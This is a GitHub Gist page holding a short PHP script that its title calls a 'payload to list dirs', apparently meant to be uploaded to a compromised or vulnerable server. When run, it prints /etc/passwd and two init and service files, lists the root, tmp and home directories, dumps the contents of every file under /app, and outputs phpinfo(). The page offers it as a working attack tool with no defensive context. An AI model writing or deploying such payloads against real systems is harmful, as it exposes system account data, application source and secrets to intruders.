Last active
August 15, 2022 15:58
-
-
Save GaurangTandon/06276369ac0f9c633194e7e5f2684b2c to your computer and use it in GitHub Desktop.
php payload to list dirs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo file_get_contents("/etc/passwd"); | |
| echo "--------\n"; | |
| echo file_get_contents("/my_init"); | |
| echo "--------\n"; | |
| echo file_get_contents("/my_service"); | |
| echo "--------\n"; | |
| $inspection_dirs=array("", "tmp", "home"); | |
| foreach ($inspection_dirs as $checkdir) { | |
| if ($handle = opendir('/' . $checkdir)) { | |
| echo "XXX" . $checkdir . "XXX\n"; | |
| while (false !== ($entry = readdir($handle))) { | |
| if ($entry != "." && $entry != "..") { | |
| echo "--------\n"; | |
| echo $entry . "\n"; | |
| echo "--------\n"; | |
| } | |
| } | |
| closedir($handle); | |
| } | |
| } | |
| if ($handle = opendir('/app')) { | |
| while (false !== ($entry = readdir($handle))) { | |
| if ($entry != "." && $entry != "..") { | |
| echo "--------\n"; | |
| echo $entry . "\n"; | |
| echo file_get_contents("/app/" . $entry); | |
| echo "--------\n"; | |
| } | |
| } | |
| closedir($handle); | |
| } | |
| echo "=====\n"; | |
| phpinfo(); | |
| echo "=====\n"; | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment